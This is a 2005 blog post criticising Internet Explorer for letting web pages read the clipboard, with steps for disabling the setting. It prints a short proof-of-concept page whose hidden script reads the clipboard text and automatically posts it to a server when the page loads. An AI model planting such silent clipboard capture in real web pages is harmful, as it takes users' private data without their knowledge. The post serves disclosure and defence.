IE can read your clipboard

November 20, 2005 – 1:11 am

This is ridiculous. Apparently IE can read your clipboard. The link of an example. The code for the “feature” goes as follows:

<html>  
    <head>  
    </head> 
    <body> 
        <form name="clip" method="post" action="test.php" style="display:none">
            <input type="text" name="content"> 
            <input type="submit"> 
        </form> 

        <script language="javascript">
            if(typeof clipboardData != 'undefined') { 
                var content = clipboardData.getData("Text"); 
                document.forms["clip"].elements["content"].value = content; 
            } 
            document.forms["clip"].submit(); 
         </script> 
      </body> 
</html>

This is an unforgivable issue. Fortunately I’ll continue to stick with Firefox and Gentoo.

EDIT: Apparently this was found back in 2004, although I’m not sure why IE is still shipping with the option enabled by default. “Microsoft Internet Explorer Unauthorized Clipboard Contents” details what is effected.

Users can close this hole by changing the default Internet setting. Preferably, Microsoft should change the default option to prompt on the Internet zone.

To close this hole in ~7 clicks: Tools, Internet Options, Security, Internet Zone, Custom Level, Scripting, Allow paste options via scripting -> Disable.

It looks like IE7 is still releasing with this “feature” enabled by default. Another great reason to use Firefox!

You must be logged in to post a comment.

Rob Raux - Observations is proudly powered by WordPress Entries (RSS) and Comments (RSS). Designed by Bob